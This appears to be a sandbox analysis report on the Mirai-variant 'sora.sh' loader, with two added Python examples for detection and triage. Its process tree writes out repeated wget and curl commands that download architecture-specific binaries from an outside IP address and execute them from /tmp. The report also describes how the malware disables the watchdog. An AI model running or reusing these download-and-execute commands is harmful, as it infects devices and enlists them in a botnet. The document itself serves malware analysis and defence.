Analysis
max time kernel: 149s
max time network: 151s
platform: debian-9_mipsel
resource: debian9-mipsel-20240611-en
resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 29-08-2024 20:19
Static task: static1
Behavioral task behavioral1: sample sora.sh, resource ubuntu1804-amd64-20240508-en
Behavioral task behavioral2: sample sora.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample sora.sh, resource debian9-mipsbe-20240729-en
General
Target: sora.sh
Size: 1KB
MD5: 4bad6b7a8f3a112f1e8a64415b2c5e57
SHA1: 80386ebec3b511cd2a07da88e300a62590b8d889
SHA256: 4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
SHA512: da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted: mirai, LZRD
Extracted: mirai, LZRD
Signatures
Contacts a large (18915) number of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
Executes dropped EXE 10 IoCs
ioc /tmp/robben, process robben, PIDs 739, 746, 752, 769, 788, 815, 825, 864, 870, 876
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the watchdog to prevent it from restarting an infected system. Mirai's public source does this by opening the watchdog device and issuing the WDIOC_SETOPTIONS ioctl with WDIOS_DISABLECARD, so a hung or overloaded device no longer reboots itself.
File opened for modification: /dev/watchdog (robben); /dev/misc/watchdog (robben)
YARA rule upx matched 4 IoCs
resource behavioral4/files/fstream-1.dat, behavioral4/files/fstream-2.dat, behavioral4/files/fstream-3.dat, behavioral4/files/fstream-5.dat (yara_rule: upx)
Reads runtime system information 32 IoCs
Reads data from /proc virtual filesystem.
File opened for reading by robben: /proc/<pid>/exe for PIDs 418, 669, 672, 675, 676, 686, 700, 701, 705, 706, 707, 708, 711, 715, 753, 757, 779, 783, 831, 866, 872, 873 (walking other processes' executables is consistent with Mirai's killer routine, which looks for competing bots to terminate)
File opened for reading by curl: /proc/sys/crypto/fips_enabled, 11 entries (a TLS-library FIPS-mode check, benign on its own)
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
File opened for modification by wget: /tmp/sora.x86, /tmp/sora.mpsl, /tmp/sora.mips, /tmp/sora.ppc, /tmp/sora.sh4, /tmp/sora.m68k, /tmp/sora.arm5, /tmp/sora.arm6, /tmp/sora.arm7
File opened for modification by curl: /tmp/sora.arm4, /tmp/sora.arm5, /tmp/sora.arm6, /tmp/sora.arm7, /tmp/sora.m68k, /tmp/sora.mpsl, /tmp/sora.mips, /tmp/sora.ppc, /tmp/sora.sh4, /tmp/sora.x86
File opened for modification by sora.sh: /tmp/robben
Processes
The loader runs the same five-step sequence once per architecture: wget, then curl -O of the same URL (a fallback in case one downloader is missing on the target), cat, chmod +x, ./robben Payload. The chmod argument list grows by one file per iteration and for a while includes the sandbox's own systemd-private-... directory, which is consistent with a wildcard chmod in /tmp. The robben instance from the mpsl iteration (PID 752) is the only one tagged with watchdog and /proc activity, consistent with the MIPS little-endian build being the one that actually ran on this mipsel sandbox.

PID 708  /tmp/sora.sh  /tmp/sora.sh  [Writes file to tmp directory]
    PID 712  /usr/bin/wget  wget http://154.216.17.67/bins/sora.x86  [Writes file to tmp directory]
    PID 730  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.x86  [Reads runtime system information; Writes file to tmp directory]
    PID 737  /bin/cat  cat sora.x86
    PID 738  /bin/chmod  chmod +x robben sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 739  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 741  /usr/bin/wget  wget http://154.216.17.67/bins/sora.mips  [Writes file to tmp directory]
    PID 743  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.mips  [Reads runtime system information; Writes file to tmp directory]
    PID 744  /bin/cat  cat sora.mips
    PID 745  /bin/chmod  chmod +x robben sora.mips sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 746  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 748  /usr/bin/wget  wget http://154.216.17.67/bins/sora.mpsl  [Writes file to tmp directory]
    PID 749  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.mpsl  [Reads runtime system information; Writes file to tmp directory]
    PID 750  /bin/cat  cat sora.mpsl
    PID 751  /bin/chmod  chmod +x robben sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 752  /tmp/robben  ./robben Payload  [Executes dropped EXE; Modifies Watchdog functionality; Reads runtime system information]
    PID 756  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm4
    PID 760  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm4  [Reads runtime system information; Writes file to tmp directory]
    PID 767  /bin/cat  cat sora.arm4
    PID 768  /bin/chmod  chmod +x robben sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 769  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 772  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm5  [Writes file to tmp directory]
    PID 779  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm5  [Reads runtime system information; Writes file to tmp directory]
    PID 784  /bin/cat  cat sora.arm5
    PID 786  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 788  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 790  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm6  [Writes file to tmp directory]
    PID 798  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm6  [Reads runtime system information; Writes file to tmp directory]
    PID 812  /bin/cat  cat sora.arm6
    PID 813  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 815  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 819  /usr/bin/wget  wget http://154.216.17.67/bins/sora.arm7  [Writes file to tmp directory]
    PID 822  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.arm7  [Reads runtime system information; Writes file to tmp directory]
    PID 823  /bin/cat  cat sora.arm7
    PID 824  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 systemd-private-4fdf3de49c2840e993619be4f6cb9744-systemd-timedated.service-qjFkNt
    PID 825  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 827  /usr/bin/wget  wget http://154.216.17.67/bins/sora.ppc  [Writes file to tmp directory]
    PID 831  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.ppc  [Reads runtime system information; Writes file to tmp directory]
    PID 862  /bin/cat  cat sora.ppc
    PID 863  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86
    PID 864  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 866  /usr/bin/wget  wget http://154.216.17.67/bins/sora.m68k  [Writes file to tmp directory]
    PID 867  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.m68k  [Reads runtime system information; Writes file to tmp directory]
    PID 868  /bin/cat  cat sora.m68k
    PID 869  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86
    PID 870  /tmp/robben  ./robben Payload  [Executes dropped EXE]
    PID 872  /usr/bin/wget  wget http://154.216.17.67/bins/sora.sh4  [Writes file to tmp directory]
    PID 873  /usr/bin/curl  curl -O http://154.216.17.67/bins/sora.sh4  [Reads runtime system information; Writes file to tmp directory]
    PID 874  /bin/cat  cat sora.sh4
    PID 875  /bin/chmod  chmod +x robben sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86
    PID 876  /tmp/robben  ./robben Payload  [Executes dropped EXE]
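The repeated download, chmod +x, execute-from-/tmp sequence in the process tree, the writes to the watchdog device, and the scan fan-out reported under Signatures are the three behaviours a host-side hunt should key on. The following is an added example written for this page, not code from the sandbox report or from the loader: it runs that hunt over a constructed event stream. The event schema (exec, file_open and connect records), the benign tail and the connect events are assumptions; the PIDs, image paths and command lines are those of the report's mpsl iteration.

```python
"""Hunt for the Mirai-style loader chain seen in this report (added example)."""
import re
from collections import defaultdict

URL_RE = re.compile(r"https?://[^\s'\"]+")
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
WATCHDOG_DEVICES = {"/dev/watchdog", "/dev/misc/watchdog"}
FANOUT_THRESHOLD = 100  # distinct hosts contacted by one pid; the sandbox saw 18915


def argv0(cmdline: str) -> str:
    """Program name as typed: './robben Payload' -> 'robben'."""
    parts = cmdline.split()
    return parts[0].rsplit("/", 1)[-1] if parts else ""


def hunt(events, fanout=FANOUT_THRESHOLD):
    """Return findings for the dropper chain, watchdog tampering and scan fan-out."""
    findings = []
    # Per parent pid; the chain must be seen in order: download -> chmod +x -> exec.
    chain = defaultdict(lambda: {"urls": set(), "chmod": False, "exec": []})
    hosts = defaultdict(set)
    for ev in events:
        if ev["type"] == "exec":
            st = chain[ev["ppid"]]
            name = argv0(ev["cmdline"])
            if name in DOWNLOADERS:
                st["urls"].update(URL_RE.findall(ev["cmdline"]))
            elif name == "chmod" and "+x" in ev["cmdline"].split() and st["urls"]:
                st["chmod"] = True
            elif ev["image"].startswith(DROP_DIRS) and st["chmod"]:
                st["exec"].append((ev["pid"], ev["image"]))
        elif ev["type"] == "file_open":
            if ev["path"] in WATCHDOG_DEVICES and "w" in ev["mode"]:
                findings.append({"rule": "watchdog_tamper", "pid": ev["pid"], "path": ev["path"]})
        elif ev["type"] == "connect":
            hosts[ev["pid"]].add(ev["dst"])
    for parent, st in chain.items():
        if st["exec"]:
            findings.append({"rule": "tmp_dropper_chain", "parent": parent,
                             "urls": sorted(st["urls"]), "exec": st["exec"]})
    for pid, seen in hosts.items():
        if len(seen) >= fanout:
            findings.append({"rule": "scan_fanout", "pid": pid, "hosts": len(seen)})
    return findings


# Constructed sample stream. PIDs 748-752 and their command lines are the report's
# mpsl iteration; the benign tail and the connect events are invented.
SAMPLE_EVENTS = [
    {"type": "exec", "pid": 708, "ppid": 1, "image": "/tmp/sora.sh", "cmdline": "/tmp/sora.sh"},
    {"type": "exec", "pid": 748, "ppid": 708, "image": "/usr/bin/wget",
     "cmdline": "wget http://154.216.17.67/bins/sora.mpsl"},
    {"type": "exec", "pid": 749, "ppid": 708, "image": "/usr/bin/curl",
     "cmdline": "curl -O http://154.216.17.67/bins/sora.mpsl"},
    {"type": "exec", "pid": 750, "ppid": 708, "image": "/bin/cat", "cmdline": "cat sora.mpsl"},
    {"type": "exec", "pid": 751, "ppid": 708, "image": "/bin/chmod",
     "cmdline": "chmod +x robben sora.mips sora.mpsl sora.sh sora.x86"},
    {"type": "exec", "pid": 752, "ppid": 708, "image": "/tmp/robben", "cmdline": "./robben Payload"},
    {"type": "file_open", "pid": 752, "path": "/dev/watchdog", "mode": "w"},
    {"type": "file_open", "pid": 752, "path": "/dev/misc/watchdog", "mode": "w"},
    # Benign: an admin fetches a tarball, no chmod, nothing executed from a drop dir.
    {"type": "exec", "pid": 900, "ppid": 1, "image": "/usr/bin/curl",
     "cmdline": "curl -O https://example.org/tool.tar.gz"},
    {"type": "exec", "pid": 901, "ppid": 1, "image": "/bin/tar", "cmdline": "tar xzf tool.tar.gz"},
] + [{"type": "connect", "pid": 752, "dst": "10.0.%d.%d:23" % (i // 256, i % 256)}
     for i in range(120)]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
```

Requiring the three stages in order under one parent is what keeps the benign curl of a tarball from firing; a looser rule that flags any execution from /tmp will be noisy on build hosts. The fan-out threshold is per process and needs tuning for hosts that legitimately talk to many peers.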
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 30KB
MD5: bcff8f405bdd93b8488e6f6aca117a32
SHA1: 8b32a1dea70be2c76830e3808f70ad62eb3b1250
SHA256: 67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
SHA512: 5d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a

Filesize: 31KB
MD5: 131fc41fbe66493277e3155f50b9fce5
SHA1: 0bbb17cb882e34dc82e51862f8245f3187664beb
SHA256: d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f
SHA512: de380e902f115a9f65ae22a5ccdd57f9210d59035bcf44615ee04df8db993c32ed1105476b30e4bdde27a3e2671532465f13de60c51514cf91e50d2957f0c247

Filesize: 33KB
MD5: 8652e70ebc913d0078f59b2526a40d36
SHA1: 1227de6168a2bcb0ab6c20c6dd0c3277ff8b45d4
SHA256: cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf
SHA512: ef4032a66c938f322422d22de399aa09811720c016645f74e7b312591687f73f5d9a630a89bbf706550f256ac89534542c44252d916ce9a1e4117911145dc5c3

Filesize: 212B
MD5: 45e588171939a0780c48755918b1cd74
SHA1: 6c33e64b1a43fb6752026fd1254cac740e7c3243
SHA256: 770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535
SHA512: fe414d5969a9cc3fb54e26ea145ac31f8114988821c5c30a18b5f3f2a74b5c9146764bd17746d49c1d823a885043ef1d2b4b359503fc5f8dbe818cb978789770

Filesize: 27KB
MD5: 00d6529558e66184baaf1b0f21e59739
SHA1: 3b9db5227c48f501573ea9b626c5c765a17e7c61
SHA256: fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d
SHA512: 49f62522017eef1de00272e61c9ae02e05ec1f43ac510290fda4b978a7b9ae28dddbbcbe769e1def88817b2ede79cd86feff3d1514352f21999acd752b4964fb

Filesize: 71KB
MD5: a0b83eba33da68f09402235338d316a8
SHA1: 15f3e890997e3b7f21c16eb1b0462bdf4ed11d61
SHA256: eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507
SHA512: 2346d6f17ac43d9ac49d755b9b6ef94deec68ca6f16b67ed273081b747215ecedaef5e702965297e0d8d1f621f08182b76db2d2e6b32814beab7db9c78c60e79
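The loader fetches one build per architecture and tries each in turn until one matches the CPU, so a file recovered from /tmp on a victim is one of several possible builds. Its ELF header says which one, and the download hashes above say whether it is a sample already seen. The following added example (written for this page; not code from the report or from the malware) does both. The mapping from e_machine and endianness to the loader's sora.<suffix> names is an assumption based on the file names in the process tree, the e_machine constants are from the ELF specification, and the sample input is a constructed minimal ELF header rather than a real payload.

```python
"""Triage of binaries dropped by the sora.sh loader (added example)."""
import hashlib
import struct

# SHA-256 values copied from the Downloads section of this report.
KNOWN_SHA256 = {
    "67180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396": "30KB download",
    "d761406aa603a32889188df5e6b444a74d6412903a4979a5814067494fd5ca1f": "31KB download",
    "cb68624a8c7366fb3ebab2e45dcc8b119001e562c8a18a66b2afc5067099fbcf": "33KB download",
    "770e501d0a52805862fd689d9832d9001926093503ddeb42bf28826c3509c535": "212B download",
    "fc2061d2e2a67d777a585f091cc515a405a87dede46dd7f6d8e0bf98ef73c76d": "27KB download",
    "eabcddb49e53ab1bb06e269fe11702f93304fdf2e1ba4bb4abd2f221a1b98507": "71KB download",
}

# ELF e_machine values (ELF specification) for the architectures the loader targets.
E_MACHINE = {0x03: "x86", 0x04: "m68k", 0x08: "mips", 0x14: "ppc", 0x28: "arm", 0x2A: "sh4"}


def elf_ident(blob: bytes):
    """Return (bits, endianness, arch) from the ELF header, or None if not ELF."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(blob[4])      # EI_CLASS
    order = {1: "<", 2: ">"}.get(blob[5])    # EI_DATA: 1 little-endian, 2 big-endian
    if bits is None or order is None:
        return None
    (e_machine,) = struct.unpack_from(order + "H", blob, 18)  # e_machine at offset 18
    arch = E_MACHINE.get(e_machine, "unknown(0x%x)" % e_machine)
    return bits, ("LE" if order == "<" else "BE"), arch


def loader_suffix(ident):
    """Assumed mapping to the loader's sora.<suffix> names. MIPS is split by
    endianness (sora.mips vs sora.mpsl); arm4..arm7 cannot be told apart from
    e_machine alone, that needs e_flags or the .ARM.attributes section."""
    if ident is None:
        return None
    _, endian, arch = ident
    if arch == "mips":
        return "mpsl" if endian == "LE" else "mips"
    return arch


def fingerprint(blob: bytes) -> dict:
    """MD5, SHA-1 and SHA-256 of the blob, matching the report's hash columns."""
    return {name: hashlib.new(name, blob).hexdigest() for name in ("md5", "sha1", "sha256")}


def triage(blob: bytes) -> dict:
    """Header classification plus a lookup against the report's download hashes."""
    fp = fingerprint(blob)
    ident = elf_ident(blob)
    return {**fp, "elf": ident, "suffix": loader_suffix(ident),
            "known": KNOWN_SHA256.get(fp["sha256"])}


def fake_elf(bits: int, order: str, e_machine: int) -> bytes:
    """Constructed test input: a minimal 52-byte ELF header, not a real payload."""
    e_ident = b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if order == "<" else 2, 1]) + b"\0" * 9
    return e_ident + struct.pack(order + "HH", 2, e_machine) + b"\0" * 32


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, triage(fh.read()))
```

Run it as `python3 triage.py /tmp/robben /tmp/sora.*` on a recovered host. Because the loader overwrites /tmp/robben on every iteration, the copy left on disk is the last build tried (sh4 in this run), not necessarily the one that executed; the per-architecture sora.* files are the better source for hash matching.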